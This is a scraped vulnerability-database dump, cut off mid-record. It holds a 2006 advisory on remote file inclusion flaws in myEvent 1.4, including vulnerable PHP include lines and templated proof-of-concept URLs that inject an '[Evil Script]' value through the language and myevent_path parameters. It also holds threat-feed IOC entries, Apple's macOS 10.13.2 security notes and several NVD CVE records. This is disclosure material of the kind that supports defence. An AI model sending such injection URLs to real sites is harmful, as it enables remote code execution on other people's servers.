Solution:
~~~~~~~~
Sanitize the Variable $language in admin.php & Sanitize the Variable $myevent_path in admin.php,
event.php, initialize.php, myevent.php, viewevent.php
Note:
~~~~
Vendor Contacted, But No Response. So Do a Dirty Patch.
Shoutz:
~~~~~~
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
{"id": "SECURITYVULNS:DOC:13878", "bulletinFamily": "software", "title": "myEvent <= 1.4 Multiple Remote File Include Vulnerabilities", "description": "---------------------------------------------------------------------------------------\r\nmyEvent 1.4 Multiple Remote File Include Vulnerabilities\r\n---------------------------------------------------------------------------------------\r\nAuthor : Sh3ll\r\nDate : 2006/08/11\r\nHomePage : http://www.sh3ll.ir\r\nContact : sh3ll[at]sh3ll[dot]ir\r\n---------------------------------------------------------------------------------------\r\nAffected Software Description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nApplication : myEvent\r\nversion : 1.4\r\nVenedor : http://www.mywebland.com\r\nClass : Remote File Inclusion\r\nRisk : High\r\nSummary : \r\nmyEvent Is a Dynamic Calendar Based Events Management System.\r\n---------------------------------------------------------------------------------------\r\nVulnerability:\r\n~~~~~~~~~~~~~\r\nin admin.php , event.php , initialize.php , myevent.php , viewevent.php We Found \r\nVulnerability Script\r\n----------------------------------------admin.php--------------------------------------\r\n....\r\n<?php\r\n include_once($language);\r\n ?>\r\n...\r\n----------------------------------------event.php--------------------------------------\r\n....\r\n<?php\r\n \r\n include_once $myevent_path."includes/template.php";\r\n ?>\r\n...\r\n--------------------------------------initialize.php-----------------------------------\r\n....\r\n<?php\r\n \r\n include $myevent_path."config.php";\r\n include $myevent_path.$language;\r\n include_once $myevent_path."includes/template.php"\r\n ?>\r\n...\r\n----------------------------------------myevent.php------------------------------------\r\n....\r\n<?php\r\n include_once $myevent_path."initialize.php";\r\n ?>\r\n...\r\n---------------------------------------viewevent.php-----------------------------------\r\n....\r\n<?php\r\n \r\n include_once 
$myevent_path."initialize.php";\r\n ?>\r\n...\r\n---------------------------------------------------------------------------------------\r\nPoC:\r\n~~~\r\nhttp://www.target.com/[myEvent]/admin.php?language=[Evil Script]\r\nhttp://www.target.com/[myEvent]/event.php?myevent_path=[Evil Script]\r\nhttp://www.target.com/[myEvent]/initialize.php?myevent_path=[Evil Script]\r\nhttp://www.target.com/[myEvent]/myevent.php?myevent_path=[Evil Script]\r\nhttp://www.target.com/[myEvent]/viewevent.php?myevent_path=[Evil Script]\r\n\r\nSolution:\r\n~~~~~~~~\r\nSanitize Variabel $language in admin.php & Sanitize Variabel $myevent_path in admin.php\r\nevent.php , initialize.php , myevent.php , viewevent.php\r\n----------------------------------------------------------------------------------------\r\nNote:\r\n~~~~\r\nVenedor Contacted, But No Response. So Do a Dirty Patch.\r\n----------------------------------------------------------------------------------------\r\nShoutz:\r\n~~~~~~\r\n~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena\r\n~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams ", "published": "2006-08-14T00:00:00", "modified": "2006-08-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13878", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2018-08-31T11:10:18", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2595", "CVE-2017-13878", "CVE-2018-13878", "CVE-2015-9286", "CVE-2008-7273", "CVE-2008-7272"]}, {"type": "apple", "idList": ["APPLE:HT208331"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-13878"]}, {"type": "nessus", "idList": ["SUSE_SU-2018-3879-1.NASL", "MACOS_10_13_2.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:43780"]}, {"type": "zdt", "idList": 
["1337DAY-ID-29581"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812400", "OPENVAS:1361412562310812408"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:18", "rev": 2}, "vulnersScore": 6.6}, "affectedSoftware": []}
{"rst": [{"lastseen": "2020-08-12T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **200[.]189.180.99** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **21**.\n First seen: 2020-06-24T03:00:00, Last seen: 2020-08-12T03:00:00.\n IOC tags: **generic**.\nASN 13878: (First IP 200.189.160.0, Last IP 200.189.191.255).\nASN Name \"UOL\" and Organisation \"DIVEO SA\".\nASN hosts 1693 domains.\nGEO IP information: City \"\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-06-24T00:00:00", "id": "RST:F5C89A96-63D8-32F6-A802-C13B4517A2F7", "href": "", "published": "2020-09-21T00:00:00", "title": "RST Threat feed. IOC: 200.189.180.99", "type": "rst", "cvss": {}}, {"lastseen": "2020-08-12T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **103[.]112.209.136** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **21**.\n First seen: 2020-06-24T03:00:00, Last seen: 2020-08-12T03:00:00.\n IOC tags: **generic**.\nASN 137547: (First IP 103.112.208.0, Last IP 103.112.211.255).\nASN Name \"LLKITASAP\" and Organisation \"Zhengzhou Lulinke Information Technology COLtd\".\nASN hosts 13878 domains.\nGEO IP information: City \"\", Country \"China\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-06-24T00:00:00", "id": "RST:4EACB6D2-AE2F-3D0E-B128-F4763C8EC0B4", "href": "", "published": "2020-09-21T00:00:00", "title": "RST Threat feed. 
IOC: 103.112.209.136", "type": "rst", "cvss": {}}, {"lastseen": "2020-08-12T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **201[.]77.222.27** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **21**.\n First seen: 2020-06-24T03:00:00, Last seen: 2020-08-12T03:00:00.\n IOC tags: **generic**.\nASN 13878: (First IP 201.77.192.0, Last IP 201.77.225.255).\nASN Name \"UOL\" and Organisation \"DIVEO SA\".\nASN hosts 1693 domains.\nGEO IP information: City \"\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-06-24T00:00:00", "id": "RST:5210097D-92EA-39BD-BF8C-24164987A076", "href": "", "published": "2020-09-21T00:00:00", "title": "RST Threat feed. IOC: 201.77.222.27", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **189[.]36.1.114** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **35**.\n First seen: 2020-08-12T03:00:00, Last seen: 2020-09-04T03:00:00.\n IOC tags: **generic**.\nASN 13878: (First IP 189.36.0.0, Last IP 189.36.8.255).\nASN Name \"UOL\" and Organisation \"DIVEO SA\".\nASN hosts 1693 domains.\nGEO IP information: City \"Santo Andr\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-12T00:00:00", "id": "RST:228D780C-7993-3068-A3A6-EC7B182403D0", "href": "", "published": "2020-09-06T00:00:00", "title": "RST Threat feed. 
IOC: 189.36.1.114", "type": "rst", "cvss": {}}], "apple": [{"lastseen": "2020-12-24T20:41:48", "bulletinFamily": "software", "cvelist": ["CVE-2017-12837", "CVE-2017-9798", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13887", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-7151", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-7158", "CVE-2017-13892", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13858", "CVE-2017-13886", "CVE-2017-13904", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7163", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13848", "CVE-2017-13862", "CVE-2017-13875"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nReleased December 6, 2017\n\n**APFS**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: APFS encryption keys may not be securely deleted after hibernating\n\nDescription: A logic issue existed in APFS when deleting keys during hibernation. 
This was addressed with improved state management.\n\nCVE-2017-13887: David Ryskalczyk\n\nEntry added June 21, 2018\n\n**apache**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory\n\nDescription: Multiple issues were addressed by updating to version 2.4.28.\n\nCVE-2017-9798: Hanno B\u00f6ck\n\nEntry updated December 18, 2018\n\n**Auto Unlock**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**Contacts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: Sharing contact information may lead to unexpected data sharing\n\nDescription: An issue existed in the handling of Contact sharing. This issue was addressed with improved handling of user information. 
\n\nCVE-2017-13892: Ryan Manly of Glenbrook High School District 225\n\nEntry added October 18, 2018\n\n**CoreAnimation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**curl**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Malicious FTP servers may be able to cause the client to read out-of-bounds memory\n\nDescription: An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-1000254: Max Dymond\n\n**Directory Utility**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nNot impacted: macOS Sierra 10.12.6 and earlier \n\nImpact: An attacker may be able to bypass administrator authentication without supplying the administrator\u2019s password\n\nDescription: A logic error existed in the validation of credentials. 
This was addressed with improved credential validation.\n\nCVE-2017-13872\n\n**ICU**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13883: Yu Wang of Didi Research America\n\nCVE-2017-7163: Yu Wang of Didi Research America\n\nCVE-2017-7155: Yu Wang of Didi Research America\n\nEntry updated December 21, 2017 \n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. 
This was addressed through improved input validation.\n\nCVE-2017-13878: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-13875: Ian Beer of Google Project Zero\n\n**IOAcceleratorFamily**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7159: found by IMF developed by HyungSeok Han (daramg.gift) of SoftSec, KAIST (softsec.kaist.ac.kr)\n\nEntry updated December 21, 2017 \n\n**IOKit**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An input validation issue existed in the kernel. 
This issue was addressed through improved input validation.\n\nCVE-2017-13848: Alex Plaskett of MWR InfoSecurity\n\nCVE-2017-13858: an anonymous researcher\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel 
Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry updated January 5, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017 \n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated January 11, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input 
sanitization.\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-13871: Lukas Pitschl of GPGTools\n\nEntry updated December 21, 2017\n\n**Mail Drafts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\nEntry updated January 10, 2018\n\n**OpenSSL**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. 
This issue was addressed with improved bounds checking.\n\nCVE-2017-3735: found by OSS-Fuzz\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: This bugs can allow remote attackers to cause a denial of service\n\nDescription: Public CVE-2017-12837 was addressed by updating the function in Perl 5.18\n\nCVE-2017-12837: Jakub Wilk\n\nEntry added October 18, 2018\n\n**Screen Sharing Server**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A user with screen sharing access may be able to access any file readable by root\n\nDescription: A permissions issue existed in the handling of screen sharing sessions. This issue was addressed with improved permissions handling.\n\nCVE-2017-7158: Trevor Jacques of Toronto\n\nEntry updated December 21, 2017\n\n**SIP**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2017-13911: Timothy Perfitt of Twocanoes Software\n\nEntry updated August 8, 2018, updated September 25, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An unprivileged user may change Wi-Fi system parameters leading to denial of service\n\nDescription: An access issue existed with privileged Wi-Fi system configuration. 
This issue was addressed with additional restrictions.\n\nCVE-2017-13886: David Kreitschmann and Matthias Schulz of Secure Mobile Networking Lab at TU Darmstadt\n\nEntry added May 2, 2018\n\n\n\n## Additional recognition\n\n**Mail**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\nEntry added February 6, 2020\n", "edition": 3, "modified": "2020-07-27T08:21:38", "published": "2020-07-27T08:21:38", "id": "APPLE:HT208331", "href": "https://support.apple.com/kb/HT208331", "title": "About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext 
insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": 
"REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:34", "description": "An XSS issue was discovered in packages/rocketchat-mentions/Mentions.js in Rocket.Chat before 0.65. The real name of a username is displayed unescaped when the user is mentioned (using the @ symbol) in a channel or private chat. 
Consequently, it is possible to exfiltrate the secret token of every user and also admins in the channel.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-07-11T01:29:00", "title": "CVE-2018-13878", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13878"], "modified": "2018-09-05T16:34:00", "cpe": [], "id": "CVE-2018-13878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13878", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:13:22", "description": "An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the \"Intel Graphics Driver\" component. 
